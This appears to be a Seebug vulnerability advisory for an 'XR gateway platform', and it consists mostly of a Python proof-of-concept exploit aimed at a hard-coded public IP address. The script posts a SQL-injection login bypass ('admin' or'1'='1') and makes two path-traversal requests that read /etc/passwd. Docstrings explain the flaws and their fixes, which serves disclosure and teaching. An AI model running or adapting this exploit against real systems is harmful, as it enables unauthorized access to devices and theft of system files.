XR网关平台SQL注入

2015-08-28T00:00:00
ID SSV:89258
Type seebug
Reporter c26
Modified 2015-08-28T00:00:00

Description

在 IP/msa/main.xp 的 username 参数处存在 SQL 注入（POST）

                                                #!/usr/bin/env python
#coding=utf-8


import requests

def login():
        """Post a crafted logon to /msa/main.xp and print the raw response.

        Demonstrates the advisory's SQL-injection claim: the ``username``
        value carries a quote and an ``or '1'='1`` clause, so a server that
        splices the field into its SQL unescaped evaluates an always-true
        predicate instead of a real credential check.  The correct server-side
        fix is a parameterised query (bound variables), not input filtering.

        Reads the module-level ``target`` global (set in ``__main__``).
        Prints the HTTP body; the request itself is not inspected for success.
        """
        url = target + '/msa/main.xp'
        # 'Fun' selects the server-side handler; 'username' is the injected
        # field, 'password' is an arbitrary filler value.
        data = {'Fun':'msaAdminLogon',
                        'username': "admin' or'1'='1",
                        'password': '123456'
                        }
        req = requests.post(url = url, data = data)
        print req.text

def download():
        """GET a path with repeated ``../`` segments and print the raw response.

        Exercises path traversal in the web layer: if the server does not
        canonicalise the request path and confine it to the document root, the
        dot segments escape ``/msa/`` and the OS file at the end of the path is
        returned.  Mitigation is normalising the path before lookup and
        rejecting anything that resolves outside the served directory.

        Reads the module-level ``target`` global (set in ``__main__``).
        NOTE(review): whether the client library collapses the ``..`` segments
        before sending is not verified here -- confirm with a packet capture.
        """
        url = target + '/msa/../../../../../../../../etc/passwd'
        req = requests.get(url = url)
        print req.text

def download2():
        """GET the data-centre download handler with a traversal file name.

        Second traversal vector, this time through an application parameter
        (``downLoadFile``) rather than the URL path, so web-server path
        normalisation alone does not cover it; the handler itself must
        validate the file name against an allow-list or a fixed base directory.

        Reads the module-level ``target`` global (set in ``__main__``).
        NOTE(review): the query parameters are joined with ``+`` (decoded as a
        space) rather than ``&``, so as written the server receives a single
        ``Fun`` value; whether the handler splits on whitespace is not shown
        here -- confirm against the original advisory.
        """
        url = target + '/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=test.txt+downLoadFile=../etc/passwd'
        req = requests.get(url = url)
        print req.text

if __name__ == '__main__':
        # 'target' is a module-level global read by login(), download() and
        # download2(); it is only bound when the script is run directly, so
        # importing this module and calling the functions raises NameError.
        target = 'http://112.16.141.6'

        # Each step prints the raw HTTP body; nothing is parsed or checked,
        # so the output must be read by hand to judge whether the request
        # reached the vulnerable code path.
        login()

        download()

        download2()